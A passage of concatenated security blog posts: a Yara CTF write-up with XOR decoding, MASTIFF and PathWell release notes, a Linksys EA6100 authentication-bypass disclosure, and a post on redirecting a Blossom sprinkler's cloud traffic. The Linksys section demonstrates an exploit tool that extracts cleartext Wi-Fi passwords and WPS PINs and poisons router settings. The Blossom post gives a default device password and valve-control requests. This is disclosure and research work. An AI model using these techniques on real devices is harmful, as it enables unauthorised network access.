00000050  21 30 27 23 36 37 30 27  78 62 7b 21 72 77 73 70  |!0'#670'xb{!rwsp|
00000060  74 70 26 72 7b 7b 26 26  7b 70 76 77 20 26 77 70  |tp&r{{&&{pvw &wp|
00000070  26 24 7a 71 7b 74 73 70  74 75 42 42              |&$zq{tsptuBB|

With the exception of the first byte (an escape character) and some carriage returns, all the values were ASCII characters. Additionally, there were a large number of lower-case b's (0x62). This would typically mean the first thing I'd try was XOR encoding using 0x62 as the initial key. However, for some reason I got hung up on the initial escape character.

Probably due to the fact I had been working on these puzzles for about 4 hours straight at this point, my mind wasn't exactly where it needed to be. I got focused on that initial escape character, convinced that it was a clue to the solution. My mind immediately went to PJL and I started scouring the Internet for any resource I could find on it. After spending too much time on it, I decided this was the wrong path.

My next thought was that it might be some esoteric programming language, and I looked up every weird language I could find. Another dead end. For some reason, I was still convinced it wasn't XOR encoding and was looking for more possibilities when a co-worker, whom I had asked to venture a guess, suggested XOR.

Despite my stubbornness, I tried XOR decoding everything with 0x62 and got the following:

It worked...somewhat. After momentarily getting over feeling stupid, I jumped back into the game and looked at the result. While the text decoded into words, it didn't look right. Notice how the case is switched and not all values decoded into something readable. We were on the right path, but hadn't gotten there completely.

The switched case was a big clue. The difference in values between upper- and lower-case ASCII characters is 32, or 0x20. For example, the value of 'a' is 97 (0x61) and the value of 'A' is 65 (0x41). Therefore, if you ever perform an XOR decode and it looks like the case is switched, try adding or subtracting 0x20 to the XOR key. In this case, I subtracted 0x20 from the key to use 0x42 and got the following output:
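
The whole decode fits in a few lines of Python; the hex string below is the "cute animal" data copied verbatim from above:

hex_string = (
    "1b2d37622f37313662252d62243730362a2730622b2c362d62362a2762302320202b36622a2d2e276e620a23"
    "2c6c620d2c2e3b62362a272c62352b2e2e623b2d3762242b2c2662362a276236303727622130272336373027"
    "78627b2172777370747026727b7b26267b7076772026777026247a717b74737074754242"
)
data = bytes.fromhex(hex_string)

for key in (0x62, 0x42):
    print(hex(key), bytes(b ^ key for b in data))

With 0x62 the output comes back case-swapped (and every 0x62 byte turns into a null), while 0x42 decodes cleanly and ends with the MD5 hash discussed below.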

We had finally decoded the message, but needed to go one more step. Searching for the MD5 hash 9c051262d099dd9245bd52df83961267 revealed that the solution to puzzle #10 was "mudkipz".

Puzzle #11

Puzzle #11 only contained a readme.txt file that stated the following:

Create an exploit for the newest version of Yara. We will be excercising responsible disclosure and
submitting this to the developers, as Yara is an awesome tool and it's something we all use. :)

I did not complete this puzzle. There are a few reasons why.

First, I did attempt it. While I looked at the code for Yara, I suspected that the most likely place a vulnerability would lie was in the module code, such as the PE module code that examines PE-specific characteristics. My thought process was that I could use a fuzzing program to fuzz the internal fields of the PE format, feed the results to Yara, and hope it crashed. While I searched for a fuzzing program that could do this, I also started running every file on my system through Yara in the hopes I would get lucky.

However, after two hours, I did not find anything so I decided to weigh my options. This was a timed CTF where, according to the instructions, the "First person to email in all the answers or has the highest score wins". I could take a chance and try to find a vulnerability, and then write an exploit for it, to get more points; or I could submit it now, not get the points, and hope I was either still high enough in points or the first one in.

Since I know my own skills and what I can accomplish in the span of a day, I decided to take a chance and send in the CTF as is. I wrote a small explanation at the end of Puzzle #11 about what I had attempted, and, so that I wasn't turning in nothing at all, I also wrote a small haiku:

Yara is the best
For finding bad stuff inline
Plusvic is the man!

Conclusion

Overall, the Yara CTF for Black Hat 2015 by phishme.com and @iheartmalware was an excellent contest. While, to me, the 11 puzzles weren't overly difficult, they were challenging and required you to think in ways you normally might not.

Most importantly, they used techniques that attackers use on a daily basis in malware and their attacks against your systems. Every one of the puzzles either used a technique that I've had to go up against "in the wild" or, in the case of the minidump crash file, used an actual infection. Anyone doing incident response should at least be somewhat familiar with the techniques used in every one of these puzzles, and should be exposed to the methods to get around them.

That said, I have two minor criticisms of the contest. First, some of the instructions were ambiguous and open to interpretation. There were times I had to guess what Yara rule I had to write or what information I had to provide for the answer. While this may have been on purpose, to see what solutions participants would come up with, I can see how it may have frustrated others.

Second, the final puzzle was a bit of an odd-ball to me. I completely understand why the creators put it in there. Yara is an excellent tool, and finding vulnerabilities in it makes the tool better and stronger. However, I feel that it's out of place because this was partially a timed contest. Finding a vulnerability and then writing an exploit for it takes time. In a contest where you may need to be the first submission, this adds tremendously to that time and could cost you the game.

My suggestion for puzzle #11 would be to instead take it in one of a few directions:

  • Give the player an existing vulnerability, have them write an exploit for it, and then write a Yara rule to detect that exploit.
  • Give the player an existing exploit, such as a malicious document or Java exploit, and require a Yara rule be written for it.
  • Take it in an entirely different direction. It is obvious the creators of the CTF want to make Yara better, so have the participants create a new module for Yara with some requirements surrounding it.

Of course, these are just suggestions and my opinion. Regardless, this was a great CTF and I plan on recommending it to those who ask me what they should do to increase their skills. I hope the creators do it again next year and I look forward to participating!


MASTIFF Output Plug-ins

MASTIFF is a living project whose continuous goal is to provide an automated means for static analysis of files. To that end, the project has multiple short- and long-term goals in place. Recently we quietly released an update that hit one of the major goals we have been working towards since the inception of the project: output plug-ins.

Previously, MASTIFF had two types of plug-ins: category plug-ins, that determine the type of file that was being analyzed; and analysis plug-ins, the code that extracts and interprets the information from the file. Any output generated from MASTIFF plug-ins had to be handled by the plug-in itself. This led to multiple problems.

  • Output handling code was being replicated in all of the plug-ins.
  • There was no consistency with how output was formatted.
  • If a new output format was desired, such as HTML, each plug-in had to be updated to handle that new format.

Thus output plug-ins were born. Output plug-ins take the data generated from the analysis plug-ins and place them in a specific output format. In other words, the text output plug-in will place the data into text files, the HTML output plug-in (forthcoming) will format the data into HTML files, etc. This allows the analysis plug-ins to focus solely on performing analysis, and allows new output formats to be quickly added to the framework.

However, a consistent format to place the data into was needed for the output plug-ins to parse and format the data properly. Unfortunately, standard formats such as JSON did not do everything that was required. So, a new "universal" format was created for MASTIFF. This format places analysis plug-in data into what we've termed tables and pages.

The majority of the data extracted by analysis plug-ins can be abstracted into one or more tables of data. For example, the embedded strings plug-in structures data into one table. Each row of the table is the information related to a specific extracted string in the file, and each column is that data field (e.g. location, type, and the string itself).

MASTIFF uses this to its advantage by storing all data in a table-like structure (known oddly enough as a table). Each table contains a header, which describes the data in the table; and multiple rows, which contain the data.

Plug-ins may also generate multiple pieces of information that each need to be stored in their own tables, but still grouped together. Another data structure, known as a page, was created to group multiple tables from a single plug-in together.

Combined, each analysis plug-in's output is stored in its own page. Within each page are one or more tables of data. Output plug-ins read each plug-in's page and go through each table, formatting the data within to the format required.
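
To make the table and page idea concrete, here is a purely illustrative sketch; the field names and layout are mine, not MASTIFF's actual classes or API:

# Illustrative only -- not the real MASTIFF data structures.
strings_table = {
    "title": "Embedded Strings",
    "header": ["Location", "Type", "String"],          # describes each column
    "rows": [
        [0x4512, "ASCII", "kernel32.dll"],
        [0x47a0, "Unicode", "http://example.com/"],
    ],
}

# A page groups one or more tables produced by a single analysis plug-in.
strings_page = {"plugin": "Embedded Strings", "tables": [strings_table]}

# An output plug-in walks each page and renders every table in its own format.
for table in strings_page["tables"]:
    print("\t".join(table["header"]))
    for row in table["rows"]:
        print("\t".join(str(col) for col in row))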

There are advantages to using the universal format outside of the output plug-ins. First, it is now possible to create plug-ins that add to or modify data from other plug-ins. For example, a plug-in that generates a new hash based on a file type does not need to place its data (i.e. a single hash) into its own data structure; it can add its hash to the File Info page data, which already contains all of the hashes. Second, plug-ins can now examine the data from other plug-ins to perform correlation on it. This allows MASTIFF to be extended even further.

From this point forward, all new analysis plug-ins will utilize the output plug-in data structures to take advantage of output plug-ins. We are working on converting all current plug-ins to use output plug-ins. The details on how to use output plug-ins, and create new ones, are contained within the MASTIFF documentation. The analysis plug-in skeleton files, used to quickly generate new plug-ins, have also been updated to utilize output plug-ins.

Currently, there are only two output plug-ins available: raw, which displays the data structures in their raw format (useful for debugging); and text, which puts the data into text files. Additional output plug-ins, including JSON and HTML, will be forthcoming.

MASTIFF Online Plug-in

One last update. We also recently pushed a new plug-in that, if enabled, will submit files from MASTIFF to MASTIFF Online Free. MASTIFF Online is the service that allows anyone to upload samples and have them analyzed by MASTIFF. The benefit to using MASTIFF Online, instead of a local install of MASTIFF, is that one does not need to worry about keeping MASTIFF up to date or whether all of the dependencies are installed.

The plug-in will upload the sample to MASTIFF Online, if the submit option is set to on, and will return the URL where the results may be found.

There are two benefits to using this plug-in. First, it helps increase the size of the MASTIFF Online repository of malware, which will help create new plug-ins and shape the future of MASTIFF. Second, when malware is uploaded to MASTIFF Online, its fuzzy hash is compared to all other malware in the repository. By uploading your malware, you can go to the site and see if there are any samples similar to the sample you are analyzing. This helps your analysis, and MASTIFF in general.

Do bear in mind that MASTIFF Online Free's database is public, so do not enable this when processing files with confidential or proprietary contents.

LibPathWell 0.6.3 Released

I am pleased to announce that a new release of the Password Topology Histogram Wear-Leveling (PathWell) library and PAM module for dynamic password-strength enforcement is now available for download here.

Version 0.6.3 is an update release of PathWell. Generally, code was cleaned up and refined as necessary. The API remains unchanged, but the library did get a revision bump -- the new version is 1:1:0. The primary goals of this release were to work out the build issues previously encountered for some flavors of Linux and to extend configure/build support to MinGW/MSYS build environments. And while the library along with the associated command line utilities compile cleanly and pass all their unit tests under Windows, setting up that build environment and getting the various dependencies (e.g., GMP, PCRE, SQLite, etc.) to compile involves a number of steps, a few hurdles, and a fair amount of determination, so be prepared if you decide to venture down that road. Perhaps that will be the topic of a future blog post. Who knows? ...

Anyway, this will likely be our last release for the 0.6.0 branch as our attention has shifted to the 0.7.0 release, which includes new features and tools. More on that to follow in the coming days, so stay tuned ...

Q: Can I have your password? A: Yes you can.

Hello folks, welcome to the first of a four-part blog mini-series on firmware and embedded devices. My name is Matt Bergin and I'll be guiding you through the series. We plan to release each part of the series on the Friday of each week in December. The release of the final part in our series is dependent on our responsible disclosure timeline holding for a finding, but we're pretty confident.

We're going to start slowly and with something simple. Today's tale is about a little access point that tried and tried but just couldn't keep its mouth shut. If it has an IP, it'll talk, and you might not like what it says. Though we tried to make it stop (see the timeline in the advisory), it didn't seem to matter to the manufacturer. So here we are: an 0day to help start your holiday season.

Sincerely,
KoreLogic

Onward and upward!

You can purchase the vulnerable device and download the corresponding firmware here: http://www.linksys.com/us/support-product?pid=01t80000003cVuwAAE

We'll start off by doing what every other blog on firmware reversing tells you to do: run binwalk. In this case, it will work without any changes and you'll end up with a sub-directory containing the files you're going to want. If you would rather work off of a live system, JTAG pins are on the board and the console can be found with your baudrate set to 115200.

# ls
bin  etc   JNAP  libexec  mnt  proc  sbin  tmp  var
dev  home  lib   linuxrc  opt  root  sys   usr  www
# cd www
# ls
bootloader_info.cgi     incoming_log.txt        security_log.txt
cgi-bin                 jcgi                    speedtest_info.cgi
dhcp_log.txt            JNAP                    sysinfo.cgi
ezwifi_cfg.cgi          license.pdf             ui
get_counter_info.cgi    outgoing_log.txt        usbinfo.cgi
getstinfo.cgi           qos_info.cgi

There are many CGI files of interest; I will only talk about a few.

# ls -la sysinfo.cgi
lrwxrwxrwx 1 root root 23 Jul 21  2014 sysinfo.cgi -> /www/ui/cgi/sysinfo.cgi
# ls -la getstinfo.cgi
lrwxrwxrwx 1 root root 25 Jul 21  2014 getstinfo.cgi -> /www/ui/cgi/getstinfo.cgi
# ls -la ezwifi_cfg.cgi
lrwxrwxrwx 1 root root 26 Jul 21  2014 ezwifi_cfg.cgi -> /www/ui/cgi/ezwifi_cfg.cgi

These files are accessible without authentication and allow a pentester to perform a variety of actions. Consider a pentest team in which one member is conducting attacks from an already established network foothold while a second, geographically separate member is positioned near the access point and wants access to the affected network; attacks like this work to their advantage. This approach reduces the need for internet-facing assets whose use may compromise the engagement, while allowing for a higher degree of persistence and anonymity. These attacks are a good example of why enterprise-grade wireless security is so important.

$ python kl-linksys-ea6100-auth-bypass.py --help
Brought to you by Level at KoreLogic

Usage: kl-linksys-ea6100-auth-bypass.py [options]

Options:
  -h, --help    show this help message and exit
  --host=HOST   Target IP address
  --sysinfo     Get target system information
  --getpwhash   Get target wireless password hash
  --getclearpw  Get target wireless SSID and cleartext password
  --isdefault   Check if target is running the default admin credential (if
                yes, obtain passphrase)
  --resetwifi   Reset the access point security (requires default passphrase)
  --poisonwifi  Poison the access point security settings
  --getwpspin   Get the WPS pin for the target

The switches above and their corresponding description convey the functionality built into our exploit.

The first is --isdefault which works by sending the access point management interface a JNAP action over HTTP. The JNAP functionality within the EA series access points has been discussed previously; see for example https://github.com/Qanan/Linksys-JNAP-Siphon

This tool does indeed siphon out some interesting information, some of it overlapping what we obtain through separate methods. While it used to be quite common for the default admin account in these types of devices to be admin/admin, we found that is no longer the case for the EA series. Instead we found a (seemingly) random password on the label of our hardware. We didn't dig into it, but let's just hope it isn't based on the serial number of the device or any other predictable value.

So, what does --isdefault do? It sends an HTTP request to the access point with a header name X-JNAP-Action whose value is a URL.

Example: http://linksys.com/jnap/core/IsAdminPasswordDefault

The access point will return an HTTP 200 with a JSON string. The string contains a key named 'output' which also contains a JSON value. This value has a key named 'isAdminPasswordDefault' and contains a boolean indicating whether or not the password has been changed.
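
As a rough sketch of that exchange in Python: the X-JNAP-Action header and action URL come straight from the description above, while the /JNAP/ endpoint path and the empty JSON body are my assumptions, not something spelled out in this post:

import json
import urllib.request

def is_admin_password_default(host):
    req = urllib.request.Request(
        "http://%s/JNAP/" % host,                    # assumed endpoint path
        data=b"{}",                                  # assumed (empty) request body
        headers={
            "X-JNAP-Action": "http://linksys.com/jnap/core/IsAdminPasswordDefault",
            "Content-Type": "application/json",
        },
    )
    with urllib.request.urlopen(req) as resp:
        reply = json.load(resp)
    return reply["output"]["isAdminPasswordDefault"]

print(is_admin_password_default("192.168.1.1"))      # hypothetical AP address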

$ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --isdefault
Brought to you by Level at KoreLogic

[+] Target host is alive, proceeding.
[+] Checking if administrator passphrase is default -
[!] Passphrase is not default

I changed the password, but what if I had not yet changed it? I mean, it's not admin/admin anymore, so I should be good, right? Wrong. The access point will tell _anyone_ the default admin password, regardless of whether it is still in use. In cases where isAdminPasswordDefault is True, the exploit will obtain the default password in cleartext. You'll see this in action later on.

What about getting access to the wireless network? Well, there are a few options. If you don't mind cracking hashes then --getpwhash will make an HTTP call to the access point at getstinfo.cgi which will then return the values shown below.

$ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getpwhash
Brought to you by Level at KoreLogic

[+] Target host is alive, proceeding.
[+] Obtaining wireless password hash -
    SSID=[redacted]
    Passphrase=[redacted]

What if you want to use WPS instead? No problem, just run --getwpspin. This makes an HTTP call to sysinfo.cgi and then parses the response for the value.

$ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getwpspin
Brought to you by Level at KoreLogic

[+] Target host is alive, proceeding.
[+] Getting WPS pin -
        WPS PIN: [redacted]

If you don't want to use any of those, or you just want the WPA2 password, you can use --getclearpw. This also makes an HTTP call to sysinfo.cgi, except this time it searches for the wireless security settings, which are stored in cleartext.

$ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getclearpw
Brought to you by Level at KoreLogic

[+] Target host is alive, proceeding.
[+] Obtaining wireless ssid and password -
        wl0 Passphrase: [redacted]
        wl0 SSID: [redacted]
        wl1 Passphrase: [redacted]
        wl1 SSID: [redacted]

If you're looking for a "poison the well" type attack, then --poisonwifi is for you. This switch makes an HTTP call that will reconfigure NVRAM so the next time a change is applied your poisoned wireless settings will also get applied. Once the HTTP call to poison the settings has taken place, the exploit will call --getclearpw and search for your poisoned settings to ensure poisoning has taken place.

$ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --poisonwifi
Brought to you by Level at KoreLogic

[+] Target host is alive, proceeding.
[+] Poisoning wireless ssid configuration
[+] Access point ssid settings poisoned. An administrator will need to hit Apply anywhere in the UI

Say stealth doesn't matter and this attack vector is still your best shot for some reason. If --isdefault returns True, the exploit can automatically reconfigure the wireless settings for quick network access. Using the switch --resetwifi will run --isdefault and, if it returns True, will then run a separate JNAP action that performs the reconfiguration.

$ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --resetwifi
Brought to you by Level at KoreLogic

[+] Target host is alive, proceeding.
[+] Resetting the access point security
[+] Admin password is default, asking for the password
[+] Got the passphrase: [redacted]
[+] AP will now restart with the SSID and passphrase: korelogic/korelogic and korelogic2/korelogic2

I hope you enjoyed reading this blog. Next week we will talk about a cloud-based smart lawn watering solution and how to retain cool functionality in smart gadgets while removing third-party access to your network. Cheers!

Unplugging An IoT Device From The Cloud

Hello again and welcome back. This is part two in our four-part series on firmware and embedded devices. Today, I will be discussing home automation and the Internet of Things (IoT). More specifically, I'll be talking about Blossom. Blossom is a cloud-based smart lawn watering system that will 'automatically' water your lawn. Normally, our goal is to break into the target device so I can inspect running processes and resident binaries to ensure they are not designed to work in ways that are counter to our interests. Today, I won't be doing that. Instead, I am going to observe the functionality of the device and how it interacts with the manufacturer's cloud-based API. Then, I'll force network traffic redirection from the device to a server I control. Finally, I will recreate a bare-minimum copy of the manufacturer's API internally so that the device will no longer require internet access for somewhat normal operation.

What does this mean? I am going to write an application to water my lawn when I want my lawn watered. Why? Because I like the functionality of smart-enabled devices, but I do not like adding potential pivot points anywhere on my networks. My hope is that this part in our series serves as a soft introduction to the thought process I typically use when removing an unwanted third party from my networks, or even when attempting to attack the underlying software of a target device.

So, how does the Blossom work? The first thing Blossom asks you to do is move your wiring over to the new system, but I won't cover that. Once you power it up, Blossom will start an access point that you can connect to, named Blossom-XXXX, where XXXX is a four-digit number. Once you install the corresponding phone app, it wants you to create an account and input some information about the geographic location where the system resides. In retrospect, since I don't care about managing my lawn settings while, say, traveling or down the street at a friend's, creating an account and providing said information may be irrelevant. There is also an HTTP portal and API which does not require any of that information.

The wireless password for every Blossom unit is '12flowers'. Once connected to the Blossom access point, you should visit the default web portal (http://192.168.10.1). The latest Blossom firmware will disable the access point after setup, but it will also disable the web portal and API I use. My advice is to not update the firmware. However, a bug in the older firmware exists where the access point does not get torn down after setup. This was a concern to me, as the Blossom also has a separate wireless adapter connected to an internet-routable network. A security issue in the Blossom web application or WSGI API could result in another easy pivot point. Fortunately, after I emailed Blossom's support group, they agreed to provide me with a firmware build that would disable the access point while retaining the web server and API. I wish other vendors would be as responsive to my requests. Bravo Blossom!

Here you can configure a few things within the Blossom. The four main sections within the UI are named Provisioning, System Info, Advanced, and Blossom. Provisioning allows you to connect Blossom to your wireless access point. System Info displays basic network adapter and operating system information. Advanced allows the wireless access point settings to be changed, the firmware to be upgraded, and the device to be rebooted or reset to its factory state. The Blossom section allows the user to change the 'Server Group' between Live, Staging, and Test. I haven't tested whether changing this value alters system settings such as running services.

POST /sys/network HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://[redacted]/
Content-Length: 175
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{"ssid":"korelogicwashere","security":4,"key":"sillyfuntimes","ip":0,"ipaddr":"192.168.2.2","ipmask":"255.255.255.0","ipgw":"192.168.2.1","ipdns1":"0.0.0.0","ipdns2":"0.0.0.0"}

They've tried to hide some non-critical things, but it doesn't seem like they put a lot of effort into it. For example, you can open and close valves arbitrarily and also change the LED colors! Their method of hiding the functionality was to comment out the associated javascript that displays that part of the UI. They didn't actually remove the underlying functionality, so the hidden controls are right there if you just view the page source.

Example requests for those looked like:

For the LED:

POST /bloom/led_custom HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://[redacted]/
Content-Length: 76
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{"type":1,"r1":90,"g1":10,"b1":0,"r2":20,"g2":20,"b2":30,"t1":500,"t2":1000}

For valve control:

POST /bloom/valve HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://[redacted]/
Content-Length: 24
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{"valve":1,"inverter":1}

At this point, my test device is sitting on a rooted Linksys WRT54GL wireless network. Inspecting the traffic is trivial from this position within the network. Even more favorably, there is no encryption between the device and the cloud-based API. As far as the type of information within the network traffic, it's mostly non-sensitive information pertaining to watering schedules, current weather information, etc. However, it does also contain the approximate GPS coordinates and physical address for the device. In my opinion, this traffic probably should be encrypted. I used fake information but have redacted the data shown here so as to not implicate unaffiliated third parties. You know ...just in case.

HTTP/1.1 200 OK
Allow: GET, POST, PUT, PATCH, HEAD, OPTIONS
Content-Type: application/json
Date: Thu, 19 Nov 2015 22:58:38 GMT
Vary: Accept
transfer-encoding: chunked
Connection: keep-alive

{"latitude": [redacted], "longitude": [redacted], "zones": [{"id": 44318, "name": "Zone 1", "plant_type": 1,
 "emitter_type": 5, "gets_rainfall": true, "user_watering_modulation": 1.0, "valve": 1, "active": true,
 "illustration": null, "thumbnail_1": null, "thumbnail_2": null, "thumbnail_3": null, "thumbnail_4": null,
 "schedule_manual_secs": 180, "auto_scheduling": true, "precipitation_rate": 16.51, "kc": 0.75},
 {"id": 44319, "name": "Zone 2", "plant_type": 1, "emitter_type": 5, "gets_rainfall": true,
 "user_watering_modulation": 1.0, "valve": 2, "active": true, "illustration": null, "thumbnail_1": null,
 "thumbnail_2": null, "thumbnail_3": null, "thumbnail_4": null, "schedule_manual_secs": 180,
 "auto_scheduling": true, "precipitation_rate": 16.51, "kc": 0.75}, {"id": 44320, "name": "Zone 3",
 "plant_type": 1, "emitter_type": 5, "gets_rainfall": true, "user_watering_modulation": 1.0, "valve": 3,
 "active": true, "illustration": null, "thumbnail_1": null, "thumbnail_2": null, "thumbnail_3": null,
 "thumbnail_4": null, "schedule_manual_secs": 180, "auto_scheduling": true, "precipitation_rate": 16.51,
 "kc": 0.75}, {"id": 44321, "name": "Zone 4", "plant_type": 1, "emitter_type": 5, "gets_rainfall": true,
 "user_watering_modulation": 1.0, "valve": 4, "active": false, "illustration": null, "thumbnail_1": null,
 "thumbnail_2": null, "thumbnail_3": null, "thumbnail_4": null, "schedule_manual_secs": 180,
 "auto_scheduling": true, "precipitation_rate": 16.51, "kc": 0.75}, {"id": 44322, "name": "Zone 5",
 "plant_type": 1, "emitter_type": 5, "gets_rainfall": true, "user_watering_modulation": 1.0, "valve": 5,
 "active": false, "illustration": null, "thumbnail_1": null, "thumbnail_2": null, "thumbnail_3": null,
 "thumbnail_4": null, "schedule_manual_secs": 180, "auto_scheduling": true, "precipitation_rate": 16.51,
 "kc": 0.75}, {"id": 44323, "name": "Zone 6", "plant_type": 1, "emitter_type": 5, "gets_rainfall": true,
 "user_watering_modulation": 1.0, "valve": 6, "active": false, "illustration": null, "thumbnail_1": null,
 "thumbnail_2": null, "thumbnail_3": null, "thumbnail_4": null, "schedule_manual_secs": 180,
 "auto_scheduling": true, "precipitation_rate": 16.51, "kc": 0.75}, {"id": 44324, "name": "Zone 7",
 "plant_type": 1, "emitter_type": 5, "gets_rainfall": true, "user_watering_modulation": 1.0, "valve": 7,
 "active": false, "illustration": null, "thumbnail_1": null, "thumbnail_2": null, "thumbnail_3": null,
 "thumbnail_4": null, "schedule_manual_secs": 180, "auto_scheduling": true, "precipitation_rate": 16.51,
 "kc": 0.75}, {"id": 44325, "name": "Zone 8", "plant_type": 1, "emitter_type": 5, "gets_rainfall": true,
 "user_watering_modulation": 1.0, "valve": 8, "active": true, "illustration": null, "thumbnail_1": null,
 "thumbnail_2": null, "thumbnail_3": null, "thumbnail_4": null, "schedule_manual_secs": 180,
 "auto_scheduling": true, "precipitation_rate": 16.51, "kc": 0.75}, {"id": 44326, "name": "Zone 9",
 "plant_type": 1, "emitter_type": 5, "gets_rainfall": true, "user_watering_modulation": 1.0, "valve": 9,
 "active": true, "illustration": null, "thumbnail_1": null, "thumbnail_2": null, "thumbnail_3": null,
 "thumbnail_4": null, "schedule_manual_secs": 180, "auto_scheduling": true, "precipitation_rate": 16.51,
 "kc": 0.75}, {"id": 44327, "name": "Zone 10", "plant_type": 1, "emitter_type": 5, "gets_rainfall": true,
 "user_watering_modulation": 1.0, "valve": 10, "active": true, "illustration": null, "thumbnail_1": null,
 "thumbnail_2": null, "thumbnail_3": null, "thumbnail_4": null, "schedule_manual_secs": 180,
 "auto_scheduling": true, "precipitation_rate": 16.51, "kc": 0.75}, {"id": 44328, "name": "Zone 11",
 "plant_type": 1, "emitter_type": 5, "gets_rainfall": true, "user_watering_modulation": 1.0, "valve": 11,
 "active": true, "illustration": null, "thumbnail_1": null, "thumbnail_2": null, "thumbnail_3": null,
 "thumbnail_4": null, "schedule_manual_secs": 180, "auto_scheduling": true, "precipitation_rate": 16.51,
 "kc": 0.75}, {"id": 44329, "name": "Zone 12", "plant_type": 1, "emitter_type": 5, "gets_rainfall": true,
 "user_watering_modulation": 1.0, "valve": 12, "active": true, "illustration": null, "thumbnail_1": null,
 "thumbnail_2": null, "thumbnail_3": null, "thumbnail_4": null, "schedule_manual_secs": 180,
 "auto_scheduling": true, "precipitation_rate": 16.51, "kc": 0.75}], "channel": "channel_[redacted]",
 "sch_start": "+60", "address": {"city": "[redacted]", "country": "[redacted]", "street2": null,
 "zipcode": "[redacted]", "state": "[redacted]", "street": "[redacted]"}, "timezone": "[redacted]",
 "current_time": "2015-11-19T14:58:37.925-08:00", "avg_eto": 1.74}

Anyhow, I was at a crossroads. There were two ways I could go about accomplishing the goal. I got close to making both work, but in the end, and for the purpose of this blog, I will only discuss one. The first way, which I won't detail how to recreate, involved code to almost completely rebuild their cloud-based API, including the phone app. The phone app has a button that lets you run the sprinklers arbitrarily, which is why it was my initial target. In the end, that route was taking much more effort than the route I'll talk about later on. First, a bit of information on how their cloud architecture works:

I thought it would work kind of like this:

[Phone App] -> [Cloud API] <-> [Blossom]

But really it works something like this:

[Phone App] -> [Blossom API] <-> [Blossom]
                                     ^
                                     |
                  [PubNub API] <-----+

PubNub is a realtime messaging service and content delivery network. The Blossom device makes thousands of HTTP calls per day, which can be difficult to scale and can probably create debugging problems when attempting to triage customer issues. PubNub likely helps with that by integrating code into the device that allows a more granular way of tracking device / user pairing and network state. PubNub returns a job identifier along with an epoch time that I believe is correlated to the job scheduled through the phone app.

There are big reasons why you want to remove third parties from your networks. One such example can be found in the Privacy Policy used by the manufacturer of the Blossom. The manufacturer is owned by a company called iConservo and the policy in full can be found at: http://myblossom.com/legal/iconservo-privacy-statement/

What We Collect

[snip]
We also collect passive information such as your IP address on certain
IConservo Products, your ZIP code, as well as information about your
IConservo Product such as MAC addresses, product model numbers,
software versions, chipset IDs, and region and language settings.
Passive information also includes information about the products you
request or purchase, the presence of other devices connected to your
local network, and the number of users and frequency of use of
IConservo Products and Services. We also collect passive information
regarding customer activities on our website. Some passive information
may be associated with personally identifying information.  [snip]

Who We Share With

We work with third parties in connection with some aspects of the
ICONSERVO Products and Services, such as but not limited to processing
payments and providing marketing assistance. 
[snip]

I'll just quote this again to make sure it's read: "the presence of other devices connected to your local network".

I will let the readers individually infer what this legal text means in relation to what the Blossom will collect about you and devices on your network.

If you want to retain the cloud-based functionality, null routing PubNub will not be an option, as an HTTP response from PubNub is what seems to actually start the watering cycle scheduled through the phone app. There is also another way to open and close valves manually through the web portal.

Blossom communicates with two internet accessible API servers: *.myblossom.com and *.pubnub.com

How do I take control of the network traffic? Just like a sandnet for malware analysis. Set up DHCP and DNS. Configure DHCP to issue the DNS server along with the lease. Next, configure DNS with records to return internal IP addresses for the aforementioned API servers. Blossom will honor this configuration.
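
Before pointing the device at the sandnet, it's worth confirming the overrides actually resolve where you expect. Here's a minimal Python sketch, run from another host on the test network, assuming the sandnet DNS is already the configured resolver; the internal IP below is a placeholder for wherever the fake API will live, and home.myblossom.com is the only hostname taken from the captures in this post.

#!/usr/bin/env python3
# Minimal sketch: confirm the sandnet DNS override is in effect before the
# Blossom is pointed at it. INTERNAL_API_IP is a placeholder for the host
# that will serve the fake API; the same check applies to whichever
# *.pubnub.com name the device asks for.
from socket import gethostbyname

INTERNAL_API_IP = "192.168.50.10"   # placeholder, not from the original setup

resolved = gethostbyname("home.myblossom.com")
print("home.myblossom.com -> {:s} ({:s})".format(
    resolved, "redirected" if resolved == INTERNAL_API_IP else "NOT redirected"))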

The redacted content contains the local IP address for my Blossom device on the testing network and a pairing code to associate the device to my demo account. A sample of the traffic to *.myblossom.com can be found below.

[redacted] - - [28/Nov/2015 08:21:38] "GET /api/device/v1/server/?q=0.8.1035&fs=0.0.9&c=[redacted]&n=p HTTP/1.1" 404 -
[redacted] - - [28/Nov/2015 08:21:53] "GET /api/device/v1/server/?q=0.8.1035&fs=0.0.9&c=[redacted]&n=p HTTP/1.1" 404 -
[redacted] - - [28/Nov/2015 08:22:08] "GET /api/device/v1/server/?q=0.8.1035&fs=0.0.9&c=[redacted]&n=p HTTP/1.1" 404 -

I noticed that if the device is unable to establish communication with the API servers, it will turn the display LED red indicating connectivity failure and eventually purple indicating the start of an automated recovery process. If connectivity is not restored on the subsequent boot, the recovery process will continue indefinitely.

